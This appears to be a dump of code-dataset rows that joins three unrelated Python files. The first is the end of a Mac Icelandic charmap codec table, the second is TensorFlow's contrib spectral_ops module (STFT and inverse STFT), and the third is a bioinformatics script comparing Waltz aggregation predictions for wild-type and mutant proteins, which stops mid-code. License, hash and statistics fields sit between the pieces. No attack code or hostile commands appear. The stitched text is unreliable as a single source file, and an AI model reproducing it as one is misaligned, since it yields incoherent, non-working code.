u'\x11' # 0x11 -> CONTROL CHARACTER
u'\x12' # 0x12 -> CONTROL CHARACTER
u'\x13' # 0x13 -> CONTROL CHARACTER
u'\x14' # 0x14 -> CONTROL CHARACTER
u'\x15' # 0x15 -> CONTROL CHARACTER
u'\x16' # 0x16 -> CONTROL CHARACTER
u'\x17' # 0x17 -> CONTROL CHARACTER
u'\x18' # 0x18 -> CONTROL CHARACTER
u'\x19' # 0x19 -> CONTROL CHARACTER
u'\x1a' # 0x1A -> CONTROL CHARACTER
u'\x1b' # 0x1B -> CONTROL CHARACTER
u'\x1c' # 0x1C -> CONTROL CHARACTER
u'\x1d' # 0x1D -> CONTROL CHARACTER
u'\x1e' # 0x1E -> CONTROL CHARACTER
u'\x1f' # 0x1F -> CONTROL CHARACTER
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> CONTROL CHARACTER
u'\xc4' # 0x80 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0x81 -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\xc7' # 0x82 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xc9' # 0x83 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xd1' # 0x84 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xd6' # 0x85 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x86 -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xe1' # 0x87 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe0' # 0x88 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe2' # 0x89 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe4' # 0x8A -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe3' # 0x8B -> LATIN SMALL LETTER A WITH TILDE
u'\xe5' # 0x8C -> LATIN SMALL LETTER A WITH RING ABOVE
u'\xe7' # 0x8D -> LATIN SMALL LETTER C WITH CEDILLA
u'\xe9' # 0x8E -> LATIN SMALL LETTER E WITH ACUTE
u'\xe8' # 0x8F -> LATIN SMALL LETTER E WITH GRAVE
u'\xea' # 0x90 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0x91 -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xed' # 0x92 -> LATIN SMALL LETTER I WITH ACUTE
u'\xec' # 0x93 -> LATIN SMALL LETTER I WITH GRAVE
u'\xee' # 0x94 -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xef' # 0x95 -> LATIN SMALL LETTER I WITH DIAERESIS
u'\xf1' # 0x96 -> LATIN SMALL LETTER N WITH TILDE
u'\xf3' # 0x97 -> LATIN SMALL LETTER O WITH ACUTE
u'\xf2' # 0x98 -> LATIN SMALL LETTER O WITH GRAVE
u'\xf4' # 0x99 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf6' # 0x9A -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf5' # 0x9B -> LATIN SMALL LETTER O WITH TILDE
u'\xfa' # 0x9C -> LATIN SMALL LETTER U WITH ACUTE
u'\xf9' # 0x9D -> LATIN SMALL LETTER U WITH GRAVE
u'\xfb' # 0x9E -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xfc' # 0x9F -> LATIN SMALL LETTER U WITH DIAERESIS
u'\xdd' # 0xA0 -> LATIN CAPITAL LETTER Y WITH ACUTE
u'\xb0' # 0xA1 -> DEGREE SIGN
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa7' # 0xA4 -> SECTION SIGN
u'\u2022' # 0xA5 -> BULLET
u'\xb6' # 0xA6 -> PILCROW SIGN
u'\xdf' # 0xA7 -> LATIN SMALL LETTER SHARP S
u'\xae' # 0xA8 -> REGISTERED SIGN
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u2122' # 0xAA -> TRADE MARK SIGN
u'\xb4' # 0xAB -> ACUTE ACCENT
u'\xa8' # 0xAC -> DIAERESIS
u'\u2260' # 0xAD -> NOT EQUAL TO
u'\xc6' # 0xAE -> LATIN CAPITAL LETTER AE
u'\xd8' # 0xAF -> LATIN CAPITAL LETTER O WITH STROKE
u'\u221e' # 0xB0 -> INFINITY
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\u2264' # 0xB2 -> LESS-THAN OR EQUAL TO
u'\u2265' # 0xB3 -> GREATER-THAN OR EQUAL TO
u'\xa5' # 0xB4 -> YEN SIGN
u'\xb5' # 0xB5 -> MICRO SIGN
u'\u2202' # 0xB6 -> PARTIAL DIFFERENTIAL
u'\u2211' # 0xB7 -> N-ARY SUMMATION
u'\u220f' # 0xB8 -> N-ARY PRODUCT
u'\u03c0' # 0xB9 -> GREEK SMALL LETTER PI
u'\u222b' # 0xBA -> INTEGRAL
u'\xaa' # 0xBB -> FEMININE ORDINAL INDICATOR
u'\xba' # 0xBC -> MASCULINE ORDINAL INDICATOR
u'\u03a9' # 0xBD -> GREEK CAPITAL LETTER OMEGA
u'\xe6' # 0xBE -> LATIN SMALL LETTER AE
u'\xf8' # 0xBF -> LATIN SMALL LETTER O WITH STROKE
u'\xbf' # 0xC0 -> INVERTED QUESTION MARK
u'\xa1' # 0xC1 -> INVERTED EXCLAMATION MARK
u'\xac' # 0xC2 -> NOT SIGN
u'\u221a' # 0xC3 -> SQUARE ROOT
u'\u0192' # 0xC4 -> LATIN SMALL LETTER F WITH HOOK
u'\u2248' # 0xC5 -> ALMOST EQUAL TO
u'\u2206' # 0xC6 -> INCREMENT
u'\xab' # 0xC7 -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0xC8 -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2026' # 0xC9 -> HORIZONTAL ELLIPSIS
u'\xa0' # 0xCA -> NO-BREAK SPACE
u'\xc0' # 0xCB -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xc3' # 0xCC -> LATIN CAPITAL LETTER A WITH TILDE
u'\xd5' # 0xCD -> LATIN CAPITAL LETTER O WITH TILDE
u'\u0152' # 0xCE -> LATIN CAPITAL LIGATURE OE
u'\u0153' # 0xCF -> LATIN SMALL LIGATURE OE
u'\u2013' # 0xD0 -> EN DASH
u'\u2014' # 0xD1 -> EM DASH
u'\u201c' # 0xD2 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0xD3 -> RIGHT DOUBLE QUOTATION MARK
u'\u2018' # 0xD4 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0xD5 -> RIGHT SINGLE QUOTATION MARK
u'\xf7' # 0xD6 -> DIVISION SIGN
u'\u25ca' # 0xD7 -> LOZENGE
u'\xff' # 0xD8 -> LATIN SMALL LETTER Y WITH DIAERESIS
u'\u0178' # 0xD9 -> LATIN CAPITAL LETTER Y WITH DIAERESIS
u'\u2044' # 0xDA -> FRACTION SLASH
u'\u20ac' # 0xDB -> EURO SIGN
u'\xd0' # 0xDC -> LATIN CAPITAL LETTER ETH
u'\xf0' # 0xDD -> LATIN SMALL LETTER ETH
u'\xde' # 0xDE -> LATIN CAPITAL LETTER THORN
u'\xfe' # 0xDF -> LATIN SMALL LETTER THORN
u'\xfd' # 0xE0 -> LATIN SMALL LETTER Y WITH ACUTE
u'\xb7' # 0xE1 -> MIDDLE DOT
u'\u201a' # 0xE2 -> SINGLE LOW-9 QUOTATION MARK
u'\u201e' # 0xE3 -> DOUBLE LOW-9 QUOTATION MARK
u'\u2030' # 0xE4 -> PER MILLE SIGN
u'\xc2' # 0xE5 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\xca' # 0xE6 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xc1' # 0xE7 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xcb' # 0xE8 -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\xc8' # 0xE9 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\xcd' # 0xEA -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0xEB -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\xcf' # 0xEC -> LATIN CAPITAL LETTER I WITH DIAERESIS
u'\xcc' # 0xED -> LATIN CAPITAL LETTER I WITH GRAVE
u'\xd3' # 0xEE -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xEF -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\uf8ff' # 0xF0 -> Apple logo
u'\xd2' # 0xF1 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xda' # 0xF2 -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xdb' # 0xF3 -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
u'\xd9' # 0xF4 -> LATIN CAPITAL LETTER U WITH GRAVE
u'\u0131' # 0xF5 -> LATIN SMALL LETTER DOTLESS I
u'\u02c6' # 0xF6 -> MODIFIER LETTER CIRCUMFLEX ACCENT
u'\u02dc' # 0xF7 -> SMALL TILDE
u'\xaf' # 0xF8 -> MACRON
u'\u02d8' # 0xF9 -> BREVE
u'\u02d9' # 0xFA -> DOT ABOVE
u'\u02da' # 0xFB -> RING ABOVE
u'\xb8' # 0xFC -> CEDILLA
u'\u02dd' # 0xFD -> DOUBLE ACUTE ACCENT
u'\u02db' # 0xFE -> OGONEK
u'\u02c7' # 0xFF -> CARON
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
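### Example (illustrative, demo only)
# The tables above can be exercised directly through the Codec class without
# registering the codec. The sample text uses Icelandic letters covered by
# this charmap.
def _example_roundtrip():
    """Encode and decode a short Icelandic string through the charmap (demo only)."""
    text = u'\xde\xf3r' # u'THORN, o-acute, r'
    encoded, _ = Codec().encode(text)
    decoded, _ = Codec().decode(encoded)
    assert decoded == text
    return encoded # '\xde\x97r'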
| gpl-3.0 | -8,900,568,713,718,267,000 | 43.801303 | 116 | 0.543769 | false |
ZhangXinNan/tensorflow | tensorflow/contrib/signal/python/ops/spectral_ops.py | 27 | 12618 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Spectral operations (e.g. Short-time Fourier Transform)."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
from tensorflow.contrib.signal.python.ops import reconstruction_ops
from tensorflow.contrib.signal.python.ops import shape_ops
from tensorflow.contrib.signal.python.ops import window_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import spectral_ops
def stft(signals, frame_length, frame_step, fft_length=None,
window_fn=functools.partial(window_ops.hann_window, periodic=True),
pad_end=False, name=None):
"""Computes the [Short-time Fourier Transform][stft] of `signals`.
Implemented with GPU-compatible ops and supports gradients.
Args:
signals: A `[..., samples]` `float32` `Tensor` of real-valued signals.
frame_length: An integer scalar `Tensor`. The window length in samples.
frame_step: An integer scalar `Tensor`. The number of samples to step.
fft_length: An integer scalar `Tensor`. The size of the FFT to apply.
If not provided, uses the smallest power of 2 enclosing `frame_length`.
window_fn: A callable that takes a window length and a `dtype` keyword
argument and returns a `[window_length]` `Tensor` of samples in the
provided datatype. If set to `None`, no windowing is used.
pad_end: Whether to pad the end of `signals` with zeros when the provided
frame length and step produces a frame that lies partially past its end.
name: An optional name for the operation.
Returns:
A `[..., frames, fft_unique_bins]` `Tensor` of `complex64` STFT values where
`fft_unique_bins` is `fft_length // 2 + 1` (the unique components of the
FFT).
Raises:
ValueError: If `signals` is not at least rank 1, `frame_length` is
not scalar, or `frame_step` is not scalar.
[stft]: https://en.wikipedia.org/wiki/Short-time_Fourier_transform
"""
with ops.name_scope(name, 'stft', [signals, frame_length,
frame_step]):
signals = ops.convert_to_tensor(signals, name='signals')
signals.shape.with_rank_at_least(1)
frame_length = ops.convert_to_tensor(frame_length, name='frame_length')
frame_length.shape.assert_has_rank(0)
frame_step = ops.convert_to_tensor(frame_step, name='frame_step')
frame_step.shape.assert_has_rank(0)
if fft_length is None:
fft_length = _enclosing_power_of_two(frame_length)
else:
fft_length = ops.convert_to_tensor(fft_length, name='fft_length')
framed_signals = shape_ops.frame(
signals, frame_length, frame_step, pad_end=pad_end)
# Optionally window the framed signals.
if window_fn is not None:
window = window_fn(frame_length, dtype=framed_signals.dtype)
framed_signals *= window
# spectral_ops.rfft produces the (fft_length/2 + 1) unique components of the
# FFT of the real windowed signals in framed_signals.
return spectral_ops.rfft(framed_signals, [fft_length])
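# Illustrative sketch (demo only): the shapes stft() produces for a
# hypothetical one-second, 16 kHz mono batch. frame_length=400 and
# frame_step=160 match the inverse_stft docstring below; fft_length defaults
# to 512 (the enclosing power of two of 400), giving 512 // 2 + 1 = 257 bins.
def _example_stft_shape():
  """Build an STFT op over zeros and return its static shape (demo only)."""
  signals = array_ops.zeros([1, 16000])  # [batch, samples]
  stfts = stft(signals, frame_length=400, frame_step=160)
  return stfts.shape  # (1, frames, 257), complex64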
def inverse_stft_window_fn(frame_step,
forward_window_fn=functools.partial(
window_ops.hann_window, periodic=True),
name=None):
"""Generates a window function that can be used in `inverse_stft`.
Constructs a window that is equal to the forward window with a further
pointwise amplitude correction. `inverse_stft_window_fn` is equivalent to
`forward_window_fn` in the case where it would produce an exact inverse.
See examples in `inverse_stft` documentation for usage.
Args:
frame_step: An integer scalar `Tensor`. The number of samples to step.
forward_window_fn: window_fn used in the forward transform, `stft`.
name: An optional name for the operation.
Returns:
A callable that takes a window length and a `dtype` keyword argument and
returns a `[window_length]` `Tensor` of samples in the provided datatype.
The returned window is suitable for reconstructing original waveform in
inverse_stft.
"""
with ops.name_scope(name, 'inverse_stft_window_fn', [forward_window_fn]):
frame_step = ops.convert_to_tensor(frame_step, name='frame_step')
frame_step.shape.assert_has_rank(0)
def inverse_stft_window_fn_inner(frame_length, dtype):
"""Computes a window that can be used in `inverse_stft`.
Args:
frame_length: An integer scalar `Tensor`. The window length in samples.
dtype: Data type of waveform passed to `stft`.
Returns:
A window suitable for reconstructing original waveform in `inverse_stft`.
Raises:
      ValueError: If `frame_length` is not scalar, `frame_step` is not scalar,
        or `forward_window_fn` is not a callable that takes a window length
        and a `dtype` keyword argument and returns a `[window_length]`
        `Tensor` of samples in the provided datatype.
"""
with ops.name_scope(name, 'inverse_stft_window_fn', [forward_window_fn]):
frame_length = ops.convert_to_tensor(frame_length, name='frame_length')
frame_length.shape.assert_has_rank(0)
# Use equation 7 from Griffin + Lim.
forward_window = forward_window_fn(frame_length, dtype=dtype)
denom = math_ops.square(forward_window)
overlaps = -(-frame_length // frame_step) # Ceiling division.
denom = array_ops.pad(denom, [(0, overlaps * frame_step - frame_length)])
denom = array_ops.reshape(denom, [overlaps, frame_step])
denom = math_ops.reduce_sum(denom, 0, keepdims=True)
denom = array_ops.tile(denom, [overlaps, 1])
denom = array_ops.reshape(denom, [overlaps * frame_step])
return forward_window / denom[:frame_length]
return inverse_stft_window_fn_inner
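# Minimal usage sketch (the 400/160 framing is an assumption; the local
# import is only for the example):
def _example_inverse_window():
  from tensorflow.python.framework import dtypes
  window_fn = inverse_stft_window_fn(frame_step=160)
  # The returned callable has the same signature as the forward window
  # functions: a frame length plus a `dtype` keyword argument.
  return window_fn(400, dtype=dtypes.float32)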
def inverse_stft(stfts,
frame_length,
frame_step,
fft_length=None,
window_fn=functools.partial(window_ops.hann_window,
periodic=True),
name=None):
"""Computes the inverse [Short-time Fourier Transform][stft] of `stfts`.
  To reconstruct an original waveform, a complementary window function should
  be used in `inverse_stft`. Such a window function can be constructed with
  `tf.contrib.signal.inverse_stft_window_fn`.
Example:
```python
frame_length = 400
frame_step = 160
waveform = tf.placeholder(dtype=tf.float32, shape=[1000])
stft = tf.contrib.signal.stft(waveform, frame_length, frame_step)
inverse_stft = tf.contrib.signal.inverse_stft(
stft, frame_length, frame_step,
window_fn=tf.contrib.signal.inverse_stft_window_fn(frame_step))
```
  If a custom `window_fn` is used in `stft`, it must be passed to
  `inverse_stft_window_fn`:
```python
frame_length = 400
frame_step = 160
  window_fn = functools.partial(window_ops.hamming_window, periodic=True)
waveform = tf.placeholder(dtype=tf.float32, shape=[1000])
stft = tf.contrib.signal.stft(
waveform, frame_length, frame_step, window_fn=window_fn)
inverse_stft = tf.contrib.signal.inverse_stft(
stft, frame_length, frame_step,
window_fn=tf.contrib.signal.inverse_stft_window_fn(
frame_step, forward_window_fn=window_fn))
```
Implemented with GPU-compatible ops and supports gradients.
Args:
stfts: A `complex64` `[..., frames, fft_unique_bins]` `Tensor` of STFT bins
representing a batch of `fft_length`-point STFTs where `fft_unique_bins`
      is `fft_length // 2 + 1`.
frame_length: An integer scalar `Tensor`. The window length in samples.
frame_step: An integer scalar `Tensor`. The number of samples to step.
fft_length: An integer scalar `Tensor`. The size of the FFT that produced
`stfts`. If not provided, uses the smallest power of 2 enclosing
`frame_length`.
window_fn: A callable that takes a window length and a `dtype` keyword
argument and returns a `[window_length]` `Tensor` of samples in the
provided datatype. If set to `None`, no windowing is used.
name: An optional name for the operation.
Returns:
A `[..., samples]` `Tensor` of `float32` signals representing the inverse
STFT for each input STFT in `stfts`.
Raises:
ValueError: If `stfts` is not at least rank 2, `frame_length` is not scalar,
`frame_step` is not scalar, or `fft_length` is not scalar.
[stft]: https://en.wikipedia.org/wiki/Short-time_Fourier_transform
"""
with ops.name_scope(name, 'inverse_stft', [stfts]):
stfts = ops.convert_to_tensor(stfts, name='stfts')
stfts.shape.with_rank_at_least(2)
frame_length = ops.convert_to_tensor(frame_length, name='frame_length')
frame_length.shape.assert_has_rank(0)
frame_step = ops.convert_to_tensor(frame_step, name='frame_step')
frame_step.shape.assert_has_rank(0)
if fft_length is None:
fft_length = _enclosing_power_of_two(frame_length)
else:
fft_length = ops.convert_to_tensor(fft_length, name='fft_length')
fft_length.shape.assert_has_rank(0)
real_frames = spectral_ops.irfft(stfts, [fft_length])
# frame_length may be larger or smaller than fft_length, so we pad or
# truncate real_frames to frame_length.
frame_length_static = tensor_util.constant_value(frame_length)
# If we don't know the shape of real_frames's inner dimension, pad and
# truncate to frame_length.
if (frame_length_static is None or
real_frames.shape.ndims is None or
real_frames.shape[-1].value is None):
real_frames = real_frames[..., :frame_length]
real_frames_rank = array_ops.rank(real_frames)
real_frames_shape = array_ops.shape(real_frames)
paddings = array_ops.concat(
[array_ops.zeros([real_frames_rank - 1, 2],
dtype=frame_length.dtype),
[[0, math_ops.maximum(0, frame_length - real_frames_shape[-1])]]], 0)
real_frames = array_ops.pad(real_frames, paddings)
# We know real_frames's last dimension and frame_length statically. If they
# are different, then pad or truncate real_frames to frame_length.
elif real_frames.shape[-1].value > frame_length_static:
real_frames = real_frames[..., :frame_length_static]
elif real_frames.shape[-1].value < frame_length_static:
pad_amount = frame_length_static - real_frames.shape[-1].value
real_frames = array_ops.pad(real_frames,
[[0, 0]] * (real_frames.shape.ndims - 1) +
[[0, pad_amount]])
# The above code pads the inner dimension of real_frames to frame_length,
# but it does so in a way that may not be shape-inference friendly.
# Restore shape information if we are able to.
if frame_length_static is not None and real_frames.shape.ndims is not None:
real_frames.set_shape([None] * (real_frames.shape.ndims - 1) +
[frame_length_static])
# Optionally window and overlap-add the inner 2 dimensions of real_frames
# into a single [samples] dimension.
if window_fn is not None:
window = window_fn(frame_length, dtype=stfts.dtype.real_dtype)
real_frames *= window
return reconstruction_ops.overlap_and_add(real_frames, frame_step)
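# Round-trip sketch (illustrative; the 400/160 hann framing is an
# assumption). With the matching window from `inverse_stft_window_fn`,
# `stft` followed by `inverse_stft` reconstructs the interior of `waveform`
# up to numerical error.
def _example_round_trip(waveform):
  stfts = stft(waveform, frame_length=400, frame_step=160)
  return inverse_stft(stfts, frame_length=400, frame_step=160,
                      window_fn=inverse_stft_window_fn(160))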
def _enclosing_power_of_two(value):
"""Return 2**N for integer N such that 2**N >= value."""
value_static = tensor_util.constant_value(value)
if value_static is not None:
return constant_op.constant(
int(2**np.ceil(np.log(value_static) / np.log(2.0))), value.dtype)
return math_ops.cast(
math_ops.pow(2.0, math_ops.ceil(
math_ops.log(math_ops.to_float(value)) / math_ops.log(2.0))),
value.dtype)
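# For example, _enclosing_power_of_two(400) evaluates to 512 (2**9), which is
# why frame_length=400 implies fft_length=512 when none is given above.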
| apache-2.0 | 7,066,219,557,007,325,000 | 42.965157 | 80 | 0.677366 | false |
najmacherrad/master_thesis | Waltz/plotcomparaisons_waltz.py | 1 | 7577 | # Waltz
# Compare results between wild type and mutant
# coding=utf-8
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import csv
from scipy import stats
from pylab import plot, show, savefig, xlim, figure, \
hold, ylim, legend, boxplot, setp, axes
import pylab
from numpy import *
def getColumn(filename, column,deli):
results = csv.reader(open(filename), delimiter=deli)
return [result[column] for result in results]
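# Illustrative note (assumes the tab-separated layout below): getColumn(
# file_wt, 3, '\t') returns the entire fourth column, header row included,
# which is why the callers below pop(0) before converting values to float.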
#import files
file_wt = 'waltzresults_wt.csv'
file_mut = 'waltzresults_mut.csv'
#------------------------------------
# AGGREGATION
#------------------------------------
#--------------------------------------
# SCATTER PLOT
pred_wt = getColumn(file_wt,3,'\t')
pred_mut = getColumn(file_mut,3,'\t')
pred_wt.pop(0)
pred_mut.pop(0)
x,y=[],[]
for i in range(0,len(pred_wt)): #max=98.662207
if pred_wt[i]=='NA':
x.append(np.nan)
else:
x.append(float(pred_wt[i]))
for i in range(0,len(pred_mut)): #max=99.665552
if pred_mut[i]=='NA':
y.append(np.nan)
else:
y.append(float(pred_mut[i]))
fig = plt.figure()
a=b=[0,100]
plt.scatter(x, y,edgecolor = 'none', c= 'k')
plt.plot(a,b,'r-')
plt.grid('on')
plt.xlim(-1,101)
plt.ylim(-1,101)
plt.xlabel('Wild types')
plt.ylabel('Deleterious DIDA mutants')
fig.savefig('waltz_wtVSmut.jpg')
#----------------
# PROBABILITY DENSITY CURVE
fig = figure()
mu1, std1 = stats.norm.fit(x)
mu2, std2 = stats.norm.fit(y)
xmin1, xmax1 = plt.xlim()
xmin2, xmax2 = plt.xlim()
x1 = np.linspace(xmin1, 100, 100)
x2 = np.linspace(xmin2, 100, 100)
p1 = stats.norm.pdf(x1, mu1, std1)
p2 = stats.norm.pdf(x2, mu2, std2)
plt.plot(x1, p1, 'k',label='Wild types (fit results: mu=%.2f,std=%.2f)'%(mu1, std1))
plt.plot(x2, p2, 'r',label='Deleterious DIDA mutants \n(fit results: mu=%.2f,std=%.2f)'%(mu2, std2))
plt.xlabel('Aggregation conformation predicted values (amylogenic regions)')
plt.ylabel('Frequency')
plt.xlim(0,100)
#plt.ylim(0,0.0)
plt.legend(loc='upper right')
fig.savefig('histwaltz_missense.png')
#missense_wt - missense_mut
miss=[]
[miss.append(a_i - b_i) for a_i, b_i in zip(x, y)]
#KOLMOGOROV-SMIRNOV:
stats.kstest(miss,'norm') # (D,pvalue) = (0.3552063996073398, 0.0)
#So we reject H0 -> not normal distribution
#WILCOXON TEST:
stats.wilcoxon(miss) # (T, pvalue) = (4898.0, 0.29548245005836105)
#So we do not reject H0 -> There is no significant difference between wt and mut
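# The normality-check-then-Wilcoxon pattern above is repeated for the
# environment scores below; a small helper capturing it (sketch only, never
# called in this script):
def _paired_tests(wt, mut):
    diff = [a - b for a, b in zip(wt, mut)]
    d, ks_p = stats.kstest(diff, 'norm')  # H0: differences are normal
    t, w_p = stats.wilcoxon(diff)         # H0: no paired difference
    return ks_p, w_p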
#--------------------------------------
# AGGREGATION ENVIRONMENT
#--------------------------------------
#--------------------------------------
# SCATTER PLOT
pred_wt = getColumn(file_wt,4,'\t')
pred_mut = getColumn(file_mut,4,'\t')
pred_wt.pop(0)
pred_mut.pop(0)
x,y=[],[]
for i in range(0,len(pred_wt)): #max=98.662207
if pred_wt[i]=='NA':
x.append(np.nan)
else:
x.append(float(pred_wt[i]))
for i in range(0,len(pred_mut)): #max=98.996656
if pred_mut[i]=='NA':
y.append(np.nan)
else:
y.append(float(pred_mut[i]))
fig = plt.figure()
a=b=[0,100]
plt.scatter(x, y,edgecolor = 'none', c= 'k')
plt.plot(a,b,'r-')
plt.grid('on')
plt.xlim(-1,101)
plt.ylim(-1,101)
plt.xlabel('Wild types')
plt.ylabel('Deleterious DIDA mutants')
fig.savefig('waltz_envt_wtVSmut.jpg')
#--------------------------------------
# PROBABILITY DENSITY CURVE
fig = figure()
mu1, std1 = stats.norm.fit(x)
mu2, std2 = stats.norm.fit(y)
xmin1, xmax1 = plt.xlim()
xmin2, xmax2 = plt.xlim()
x1 = np.linspace(xmin1, 100, 100)
x2 = np.linspace(xmin2, 100, 100)
p1 = stats.norm.pdf(x1, mu1, std1)
